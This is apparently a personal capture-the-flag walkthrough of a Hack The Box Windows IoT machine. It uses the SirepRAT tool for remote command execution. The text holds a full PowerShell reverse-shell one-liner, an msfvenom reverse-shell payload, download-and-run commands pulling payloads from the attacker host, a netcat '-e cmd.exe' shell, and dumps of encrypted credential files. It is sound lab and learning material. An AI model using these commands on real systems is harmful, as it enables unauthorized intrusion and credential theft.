ncalrpc:\[protected_storage\] ncalrpc:\[lsasspirpc\] ncalrpc:\[lsapolicylookup\] ncalrpc:\[LSA_EAS_ENDPOINT\] ncalrpc:\[LSA_IDPEXT_ENDPOINT\] ncalrpc:\[lsacap\] ncalrpc:\[LSARPC_ENDPOINT\] ncalrpc:\[securityevent\] ncalrpc:\[audit\] ncacn_np:\\\\omni\[\\pipe\\lsass\]   Protocol: N/A Provider: N/A UUID : 8FB74744-B2FF-4C00-BE0D-9EF9A191FE1B v1.0 Ngc Pop Key Service Bindings: ncalrpc:\[samss lpc\] ncalrpc:\[SidKey Local End Point\] ncalrpc:\[protected_storage\] ncalrpc:\[lsasspirpc\] ncalrpc:\[lsapolicylookup\] ncalrpc:\[LSA_EAS_ENDPOINT\] ncalrpc:\[LSA_IDPEXT_ENDPOINT\] ncalrpc:\[lsacap\] ncalrpc:\[LSARPC_ENDPOINT\] ncalrpc:\[securityevent\] ncalrpc:\[audit\] ncacn_np:\\\\omni\[\\pipe\\lsass\]   Protocol: N/A Provider: N/A UUID : B25A52BF-E5DD-4F4A-AEA6-8CA7272A0E86 v2.0 KeyIso Bindings: ncalrpc:\[samss lpc\] ncalrpc:\[SidKey Local End Point\] ncalrpc:\[protected_storage\] ncalrpc:\[lsasspirpc\] ncalrpc:\[lsapolicylookup\] ncalrpc:\[LSA_EAS_ENDPOINT\] ncalrpc:\[LSA_IDPEXT_ENDPOINT\] ncalrpc:\[lsacap\] ncalrpc:\[LSARPC_ENDPOINT\] mcalrpc:\[securityevent\] ncalrpc:\[audit\] ncacn_np:\\\\omni\[\\pipe\\lsass\]   Protocol: N/A Provider: N/A UUID : E3DC38E9-B3AF-4ED1-9CC8-938DE5F16E14 v1.0 Bindings: ncalrpc:\[LRPC-c287ee4ce6ffbb3d91\]   Protocol: N/A Provider: N/A UUID : 64D1D045-F675-460B-8A94-570246B36DAB v1.0 CLIPSVC Default RPC Interface Bindings: ncalrpc:\[ClipServiceTransportEndpoint-00001\]   \[\*\] Received 382 endpoints.

Nothing that interesting. What happens if I try to navigate to the 8080 port with my browswer?

Ok, this is something. What is "Windows Device Portal"? Hm, it's some IoT build of Windows, and there's a RAT built in basically?

https://www.zdnet.com/article/new-exploit-lets-attackers-take-control-of-windows-iot-core-devices/

I cloned the github py project SirepRAT. I got an error executing it, the module hexdump cant be imported.

https://github.com/SafeBreach-Labs/SirepRAT

Oh yeah, I never installed python2 pip on my new Kali VM. Need to edit /etc/apt/sources.list and uncomment the deb-src entry, update, apt install python-pip, then I can do pip install hexdump. Also need to install enum34 module.

Now lets see if we can execute code...

  \| \~/cybersecurity/Tools/host-tools/git-tools/SirepRAT    master ············· 4s   17:48:34 ─╮ ❯ python \~/cybersecurity/Tools/host-tools/git-tools/SirepRAT/SirepRAT.py 10.10.10.204 LaunchCommandWithOutput \--return_output \--cmd \"C:\\Windows\\System32\\cmd.exe\" \--args \"ipconfig\" \--v \-\-\-\-\-\-\-\-- Microsoft Windows \[Version 10.0.17763.107\] Copyright (c) Microsoft Corporation. All rights reserved.   C:\\windows\\system32\> \-\-\-\-\-\-\-\-- \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\> \<OutputStreamResult \| type: 11, payload length: 125, payload peek: \'Microsoft Windows \[Version 10.0.17763.107\]Copyri\'\>

Something happened, but the code didn't execute. Can I run it through PS? Yes.

  \| \~/cybersecurity/Tools/host-tools/git-tools/SirepRAT    master ············· 4s   17:50:39 ─╮ ❯ python \~/cybersecurity/Tools/host-tools/git-tools/SirepRAT/SirepRAT.py 10.10.10.204 LaunchCommandWithOutput \--return_output \--cmd \"C:\\Windows\\System32\\cmd.exe\" \--args \"/c powershell.exe ipconfig\" \--v \-\-\-\-\-\-\-\--   Windows IP Configuration     Ethernet adapter Ethernet0:   Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : dead:beef::c57f:65:e221:1b2e Temporary IPv6 Address. . . . . . : dead:beef::6576:54d7:964e:1f36 Link-local IPv6 Address . . . . . : fe80::c57f:65:e221:1b2e%4 IPv4 Address. . . . . . . . . . . : 10.10.10.204 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:9eb2%4 10.10.10.2   \-\-\-\-\-\-\-\-- \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\> \<OutputStreamResult \| type: 11, payload length: 535, payload peek: \'Windows IP ConfigurationEthernet adapter E\'\> \<ErrorStreamResult \| type: 12, payload length: 4, payload peek: \'\'\>

Shit, that was pretty easy. There's a module here to upload a full shell I think, let me look at the documentation real quick. Yeah, I'll try to upload a shell and execute it.

  \| \~/cybersecurity/Tools/host-tools/git-tools/SirepRAT    master ············· 6s   17:52:01 ─╮ ❯ python \~/cybersecurity/Tools/host-tools/git-tools/SirepRAT/SirepRAT.py 10.10.10.204 PutFileOnDevice \--remote_path \"C:\\Windows\\System32\\wscipt.exe\" \--data ../../../../htb/shells/winx86-10.10.14.11-443.exe \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\> \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\>     \| \~/cybersecurity/Tools/host-tools/git-tools/SirepRAT    master ············· 4s   17:55:53 ─╮ ❯ python \~/cybersecurity/Tools/host-tools/git-tools/SirepRAT/SirepRAT.py 10.10.10.204 LaunchCommandWithOutput \--return_output \--cmd \"C:\\Windows\\System32\\cmd.exe\" \--args \"/c C:\\Windows\\System32\\wscipt.exe\" \--v \-\-\-\-\-\-\-\-- The system cannot execute the specified program.   \-\-\-\-\-\-\-\-- \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\> \<OutputStreamResult \| type: 11, payload length: 50, payload peek: \'The system cannot execute the specified program.\'\> \<ErrorStreamResult \| type: 12, payload length: 4, payload peek: \'\'\>

Doesn't work. Ok, well I know PS execution works, can I just pop off a one-liner?

  \| \~/cybersecurity/Tools/host-tools/git-tools/SirepRAT    master ············· INT ✘  17:59:24 ─╮ ❯ python \~/cybersecurity/Tools/host-tools/git-tools/SirepRAT/SirepRAT.py 10.10.10.204 LaunchCommandWithOutput \--return_output \--cmd \"C:\\Windows\\System32\\cmd.exe\" \--args \"/c powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient(\'10.10.14.11\',443);\$stream = \$client.GetStream();\[byte\[\]\]\$bytes = 0..65535\|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2\>&1 \| Out-String );\$sendback2 = \$sendback + \'PS \' + (pwd).Path + \'\> \';\$sendbyte = (\[text.encoding\]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\"\" \--v

Ok fuck this lets just go back to basics.

  \| \~/cybersecurity/htb/boxes/10.10.10.204-omni ··································· 3s   18:30:50 ─╮ ❯ python \~/cybersecurity/Tools/host-tools/git-tools/SirepRAT/SirepRAT.py 10.10.10.204 LaunchCommandWithOutput \--return_output \--cmd \"C:\\Windows\\System32\\cmd.exe\" \--args \"/c net users\" \--v \-\-\-\-\-\-\-\--   User accounts for \\\\   \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-- Administrator app DefaultAccount DevToolsUser Guest sshd WDAGUtilityAccount The command completed with one or more errors.     \-\-\-\-\-\-\-\-- \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\> \<OutputStreamResult \| type: 11, payload length: 338, payload peek: \'User accounts for \\\\\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\--\'\> \<ErrorStreamResult \| type: 12, payload length: 4, payload peek: \'\'\>

  What is our user profile path?

  \| \~/cybersecurity/htb/boxes/10.10.10.204-omni ··································· 3s   18:32:45 ─╮ ❯ python \~/cybersecurity/Tools/host-tools/git-tools/SirepRAT/SirepRAT.py 10.10.10.204 LaunchCommandWithOutput \--return_output \--cmd \"C:\\Windows\\System32\\cmd.exe\" \--args \"/c echo {{userprofile}}\" \--v \-\-\-\-\-\-\-\-- C:\\Data\\Users\\System   \-\-\-\-\-\-\-\-- \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\> \<OutputStreamResult \| type: 11, payload length: 22, payload peek: \'C:\\Data\\Users\\System\'\> \<ErrorStreamResult \| type: 12, payload length: 4, payload peek: \'\'\>

Might have gotten file upload...

  \| \~/cybersecurity/htb/boxes/10.10.10.204-omni ··································· 4s   18:37:21 ─╮ ❯ python \~/cybersecurity/Tools/host-tools/git-tools/SirepRAT/SirepRAT.py 10.10.10.204 LaunchCommandWithOutput \--return_output \--cmd \"C:\\Windows\\System32\\cmd.exe\" \--args \"/c powershell.exe Invoke-WebRequest -Uri <http://10.10.14.11/ps-oneliner.ps1> -OutFile C:\\Data\\Users\\System\\ps.ps1\" \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\> \<ErrorStreamResult \| type: 12, payload length: 4, payload peek: \'\'\>

Nope. What about shell this way?

  \| \~/cybersecurity/htb/boxes/10.10.10.204-omni ··································· 7s   18:45:51 ─╮ ❯ python \~/cybersecurity/Tools/host-tools/git-tools/SirepRAT/SirepRAT.py 10.10.10.204 LaunchCommandWithOutput \--return_output \--cmd \"C:\\Windows\\System32\\cmd.exe\" \--args \"/c powershell.exe Invoke-WebRequest -Uri <http://10.10.14.11/winx86-10.10.14.11-443.exe> -OutFile C:\\Data\\Users\\System\\test.exe\" \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\> \<ErrorStreamResult \| type: 12, payload length: 4, payload peek: \'\'\>

I'm having some fucking issues with my quotations and stuff, let me see if I can declare the arg as a variable. Ok. I can.

  \~ ····················································································· 13:42:34 ─╮ ❯ sireprat \$omni LaunchCommandWithOutput \--return_output \--cmd cmd.exe \--args \$siarg \--v ─╯ \-\-\-\-\-\-\-\--   Windows IP Configuration     Ethernet adapter Ethernet0:   Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : dead:beef::c57f:65:e221:1b2e Temporary IPv6 Address. . . . . . : dead:beef::6576:54d7:964e:1f36 Temporary IPv6 Address. . . . . . : dead:beef::985c:b716:ebdc:9892 Link-local IPv6 Address . . . . . : fe80::c57f:65:e221:1b2e%4 IPv4 Address. . . . . . . . . . . : 10.10.10.204 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:9eb2%4 10.10.10.2   \-\-\-\-\-\-\-\-- \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\> \<OutputStreamResult \| type: 11, payload length: 606, payload peek: \'Windows IP ConfigurationEthernet adapter E\'\> \<ErrorStreamResult \| type: 12, payload length: 4, payload peek: \'\'\>

Now, can I pass a powershell command to it? Yes.

❯ export siarg=\" /c powershell -nop -c \\\"ifconfig\\\"\" ─╯     \~ ····················································································· 14:03:01 ─╮ ❯ echo \$siarg ─╯ /c powershell -nop -c \"ifconfig\"     \~ ····················································································· 14:03:07 ─╮ ❯ sireprat \$omni LaunchCommandWithOutput \--return_output \--cmd cmd.exe \--args \$siarg \--v ─╯ \-\-\-\-\-\-\-\-- ifconfig : The term \'ifconfig\' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:1 \+ ifconfig \+ \~\~\~\~\~\~\~\~ \+ CategoryInfo : ObjectNotFound: (ifconfig:String) \[\], CommandNot FoundException \+ FullyQualifiedErrorId : CommandNotFoundException   \-\-\-\-\-\-\-\-- \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\> \<OutputStreamResult \| type: 11, payload length: 430, payload peek: \'ifconfig : The term \'ifconfig\' is not recognized a\'\> \<ErrorStreamResult \| type: 12, payload length: 4, payload peek: \'\'\>

I still cant use the PS reverse shell oneliner, even with it properly escaped. I should probably try to figure out the architecture.

  \~ ············································································· 3s   14:07:08 ─╮ ❯ export siarg=\" /c SET Processor \" ─╯     \~ ····················································································· 14:08:09 ─╮ ❯ sireprat \$omni LaunchCommandWithOutput \--return_output \--cmd cmd.exe \--args \$siarg \--v ─╯ \-\-\-\-\-\-\-\-- PROCESSOR_ARCHITECTURE=AMD64 PROCESSOR_IDENTIFIER=AMD64 Family 23 Model 1 Stepping 2, AuthenticAMD PROCESSOR_LEVEL=23 PROCESSOR_REVISION=0102   \-\-\-\-\-\-\-\-- \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\> \<OutputStreamResult \| type: 11, payload length: 146, payload peek: \'PROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER\'\> \<ErrorStreamResult \| type: 12, payload length: 4, payload peek: \'\'\>

Well, I was using a 32-bit payload that whole time yesterday, fuck me. I need to generate a new one that targets Windows x64, then spin up a web server to serve the file.

  \| \~/cybersecurity/htb/boxes/10.10.10.204-omni ··········································· 13:15:46 ─╮ ❯ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.16 lport=443 -f exe -o iot.exe ─╯ \[-\] No platform was selected, choosing Msf::Module::Platform::Windows from the payload \[-\] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of exe file: 7168 bytes Saved as: iot.exe     \| \~/cybersecurity/htb/boxes/10.10.10.204-omni ·································· 12s   14:18:25 ─╮ ❯ py-serve ─╯ Serving HTTP on 0.0.0.0 port 80 \...

Now I can use PS to initiate a download of the file from my host. First I have to make sure I escaped the download command correctly.

  \~ ············································································· 3s   14:08:24 ─╮ ❯ export siarg=\" /c powershell -nop -c \\\"Invoke-WebRequest -Uri <http://10.10.14.16/iot.exe> -OutFile C:\\\\Data\\\\Users\\\\System\\\\iot.exe\\\"\"     \~ ······················································································ 14:22:45 ─╮ ❯ echo \$siarg ─╯ /c powershell -nop -c \"Invoke-WebRequest -Uri <http://10.10.14.16/iot.exe> -OutFile C:\\Datasers\\System\\iot.exe\"

Looks good. Now I can execute. Looks like the file got grabbed!

  \~ ······················································································ 14:23:37 ─╮ ❯ sireprat \$omni LaunchCommandWithOutput \--return_output \--cmd cmd.exe \--args \$siarg \--v ─╯ \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\>     \| \~/cybersecurity/htb/boxes/10.10.10.204-omni ·································· 12s   14:18:25 ─╮ ❯ py-serve ─╯ Serving HTTP on 0.0.0.0 port 80 \... 10.10.10.204 - - \[14/Sep/2020 14:24:17\] \"GET /iot.exe HTTP/1.1\" 200 -

Now I set my escaped string to call my uploaded payload and check it. Looks good.

  \~ ······················································································ 14:26:14 ─╮ ❯ export siarg=\" /c start C:\\\\Data\\\\Users\\\\System\\\\iot.exe\" ─╯     \~ ······················································································ 14:26:28 ─╮ ❯ echo \$siarg ─╯ /c start C:\\Datasers\\System\\iot.exe

Now I can attempt to execute my payload.

  \~ ······················································································ 14:26:30 ─╮ ❯ sireprat \$omni LaunchCommandWithOutput \--return_output \--cmd cmd.exe \--args \$siarg \--v ─╯ \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\> \<ErrorStreamResult \| type: 12, payload length: 4, payload peek: \'\'\>

What the fuck. Can I upload to C:\Users\Public? Is that the problem?

  \~ ······················································································ 14:29:00 ─╮ ❯ sireprat \$omni LaunchCommandWithOutput \--return_output \--cmd cmd.exe \--args \$siarg \--v ─╯ \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\> \<ErrorStreamResult \| type: 12, payload length: 4, payload peek: \'\'\>   10.10.10.204 - - \[14/Sep/2020 14:29:07\] \"GET /iot.exe HTTP/1.1\" 200 -

Still not working, let's try uploading a 64 bit version of netcat.

  \~ ·············································································· INT ✘  14:39:13 ─╮ ❯ export siarg=\" /c powershell -nop -c \\\"Invoke-WebRequest -Uri <http://10.10.14.16/nc64.exe> -OutFile C:\\\\Data\\\\Users\\\\System\\\\nc64.exe\\\"\"     \~ ······················································································ 14:39:42 ─╮ ❯ sireprat \$omni LaunchCommandWithOutput \--return_output \--cmd cmd.exe \--args \$siarg \--v ─╯ \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\>

Still didn't work, let's try uploading it to C:\Users\Public.

  \~ ·············································································· INT ✘  14:46:08 ─╮ ❯ export siarg=\" /c powershell -nop -c \\\"Invoke-WebRequest -Uri <http://10.10.14.16/nc64.exe> -OutFile C:\\\\Users\\\\Public\\\\nc64.exe\\\"\"     \~ ·············································································· 3s   14:46:42 ─╮ ❯ sireprat \$omni LaunchCommandWithOutput \--return_output \--cmd cmd.exe \--args \$siarg \--v ─╯ \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\> \<ErrorStreamResult \| type: 12, payload length: 4, payload peek: \'\'\>

File downloaded, now can I get a shell?

  \~ ·············································································· INT ✘  14:47:16 ─╮ ❯ export siarg=\"10.10.14.16 443 -e cmd.exe \" ─╯     \~ ······················································································ 14:47:22 ─╮ ❯ sireprat \$omni LaunchCommandWithOutput \--return_output \--cmd C:\\\\Users\\\\Public\\\\nc64.exe \--args \$siarg \--v ─╯ \<HResultResult \| type: 1, payload length: 4, HResult: 0x0\>

Yes! What the fuck. That was an adventure. Turns out I just needed the correct nc64 build.

\[\*\] Starting interaction with 5\...   ipconfig ipconfig   Windows IP Configuration     Ethernet adapter Ethernet0:   Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : dead:beef::c57f:65:e221:1b2e Temporary IPv6 Address. . . . . . : dead:beef::6576:54d7:964e:1f36 Temporary IPv6 Address. . . . . . : dead:beef::985c:b716:ebdc:9892 Link-local IPv6 Address . . . . . : fe80::c57f:65:e221:1b2e%4 IPv4 Address. . . . . . . . . . . : 10.10.10.204 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:9eb2%4 10.10.10.2   C:\\windows\\system32\>

User flag is obsfucated?

c:\\Data\\Users\\app\>type user.txt type user.txt \<Objs Version=\"1.1.0.1\" xmlns=\"http://schemas.microsoft.com/powershell/2004/04\"\> \<Obj RefId=\"0\"\> \<TN RefId=\"0\"\> \<T\>System.Management.Automation.PSCredential\</T\> \<T\>System.Object\</T\> \</TN\> \<ToString\>System.Management.Automation.PSCredential\</ToString\> \<Props\> \<S N=\"UserName\"\>flag\</S\> \<SS N=\"Password\"\>01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7\</SS\> \</Props\> \</Obj\> \</Objs\>

Looks like there is a password for the administrator account in the desktop as well.

c:\\Data\\Users\\app\>type iot-admin.xml type iot-admin.xml \<Objs Version=\"1.1.0.1\" xmlns=\"http://schemas.microsoft.com/powershell/2004/04\"\> \<Obj RefId=\"0\"\> \<TN RefId=\"0\"\> \<T\>System.Management.Automation.PSCredential\</T\> \<T\>System.Object\</T\> \</TN\> \<ToString\>System.Management.Automation.PSCredential\</ToString\> \<Props\> \<S N=\"UserName\"\>omni\\administrator\</S\> \<SS N=\"Password\"\>01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa28853640000000002000000000010660000000100002000000000855856bea37267a6f9b37f9ebad14e910d62feb252fdc98a48634d18ae4ebe000000000e80000000020000200000000648cd59a0cc43932e3382b5197a1928ce91e87321c0d3d785232371222f554830000000b6205d1abb57026bc339694e42094fd7ad366fe93cbdf1c8c8e72949f56d7e84e40b92e90df02d635088d789ae52c0d640000000403cfe531963fc59aa5e15115091f6daf994d1afb3c2643c945f2f4b8f15859703650f2747a60cf9e70b56b91cebfab773d0ca89a57553ea1040af3ea3085c27\</SS\> \</Props\> \</Obj\> \</Objs\> c:\\Data\\Users\\app\>

I should search for any interesting files on this machine first.

PS C:\\\> Get-ChildItem -Recurse -File -force -Path \"C:\\Program Files\" -ErrorAction SilentlyContinue Get-ChildItem -Recurse -File -force -Path \"C:\\Program Files\" -ErrorAction SilentlyContinue     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\Json.Net\\7.0.1     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 246 Json.Net.psd1 -a\-\-\-- 10/26/2018 11:36 PM 1077 license.txt -a\-\-\-- 10/26/2018 11:36 PM 484864 Newtonsoft.Json.dll     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a-h\-- 8/21/2020 12:56 PM 247 r.bat     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 71168 Microsoft.PackageManagement.Ar chiverProviders.dll -a\-\-\-- 10/26/2018 11:36 PM 57856 Microsoft.PackageManagement.Co reProviders.dll -a\-\-\-- 10/26/2018 11:36 PM 254464 Microsoft.PackageManagement.dl l -a\-\-\-- 10/26/2018 11:36 PM 68608 Microsoft.PackageManagement.Me taProvider.PowerShell.dll -a\-\-\-- 10/26/2018 11:37 PM 165376 Microsoft.PowerShell.PackageMa nagement.dll -a\-\-\-- 10/26/2018 11:36 PM 16479 PackageManagement.format.ps1xm l -a\-\-\-- 10/26/2018 11:36 PM 2338 PackageManagement.psd1 -a\-\-\-- 10/26/2018 11:36 PM 10649 PackageProviderFunctions.psm1     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\DSCResources     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:37 PM 9395 PackageManagementDscUtilities. psm1     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0 .0.1\\DSCResources\\en-US     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:37 PM 1750 PackageManagementDscUtilities. strings.psd1     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0 .0.1\\DSCResources\\MSFT_PackageManagement     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 13522 MSFT_PackageManagement.psm1 -a\-\-\-- 10/26/2018 11:36 PM 1080 MSFT_PackageManagement.schema. mof     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0 .0.1\\DSCResources\\MSFT_PackageManagement\\en-US     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 1778 MSFT_PackageManagement.schema. mfl -a\-\-\-- 10/26/2018 11:36 PM 2024 MSFT_PackageManagement.strings .psd1     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0 .0.1\\DSCResources\\MSFT_PackageManagementSource     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 24228 MSFT_PackageManagementSource.p sm1 -a\-\-\-- 10/26/2018 11:36 PM 960 MSFT_PackageManagementSource.s chema.mof     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0 .0.1\\DSCResources\\MSFT_PackageManagementSource\\en-US     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:35 PM 1778 MSFT_PackageManagementSource.s chema.mfl -a\-\-\-- 10/26/2018 11:35 PM 3078 MSFT_PackageManagementSource.s trings.psd1     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\en     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 4096 Microsoft.PackageManagement.Ar chiverProviders.resources.dll -a\-\-\-- 10/26/2018 11:36 PM 6144 Microsoft.PackageManagement.Co reProviders.resources.dll -a\-\-\-- 10/26/2018 11:36 PM 6144 Microsoft.PackageManagement.Me taProvider.PowerShell.resource s.dll -a\-\-\-- 10/26/2018 11:36 PM 12288 Microsoft.PackageManagement.re sources.dll -a\-\-\-- 10/26/2018 11:36 PM 17408 Microsoft.PowerShell.PackageMa nagement.resources.dll     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 744 Build.bat -a\-\-\-- 10/26/2018 11:36 PM 1536 build.psake.ps1 -a\-\-\-- 10/26/2018 11:36 PM 14970 CHANGELOG.md -a\-\-\-- 10/26/2018 11:36 PM 5076 chocolateyInstall.ps1 -a\-\-\-- 10/26/2018 11:36 PM 611 LICENSE -a\-\-\-- 10/26/2018 11:36 PM 5879 nunit_schema_2.5.xsd -a\-\-\-- 10/26/2018 11:36 PM 1844 Pester.nuspec -a\-\-\-- 10/26/2018 11:36 PM 4116 Pester.psd1 -a\-\-\-- 10/26/2018 11:36 PM 26966 Pester.psm1 -a\-\-\-- 10/26/2018 11:36 PM 11157 Pester.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 5804 README.md     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\bin     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 925 Pester.bat     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\en-US     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 3110 about_BeforeEach_AfterEach.hel p.txt -a\-\-\-- 10/26/2018 11:36 PM 6396 about_Mocking.help.txt -a\-\-\-- 10/26/2018 11:36 PM 5056 about_Pester.help.txt -a\-\-\-- 10/26/2018 11:36 PM 5945 about_should.help.txt -a\-\-\-- 10/26/2018 11:36 PM 1156 about_TestDrive.help.txt     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Examples\\Calculator     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 55 Add-Numbers.ps1 -a\-\-\-- 10/26/2018 11:36 PM 606 Add-Numbers.Tests.ps1     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Examples\\Validator     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 822 Validator.Tests.ps1     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Functions     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 457 BreakAndContinue.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 2337 Context.ps1 -a\-\-\-- 10/26/2018 11:36 PM 758 Context.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 17753 Coverage.ps1 -a\-\-\-- 10/26/2018 11:36 PM 11436 Coverage.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 4089 Describe.ps1 -a\-\-\-- 10/26/2018 11:36 PM 761 Describe.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 761 GlobalMock-A.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 732 GlobalMock-B.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 821 In.ps1 -a\-\-\-- 10/26/2018 11:36 PM 554 In.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 3905 InModuleScope.ps1 -a\-\-\-- 10/26/2018 11:36 PM 1608 InModuleScope.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 11944 It.ps1 -a\-\-\-- 10/26/2018 11:36 PM 9754 It.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 48984 Mock.ps1 -a\-\-\-- 10/26/2018 11:36 PM 59713 Mock.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 3311 New-Fixture.ps1 -a\-\-\-- 10/26/2018 11:36 PM 3202 New-Fixture.Tests.ps1 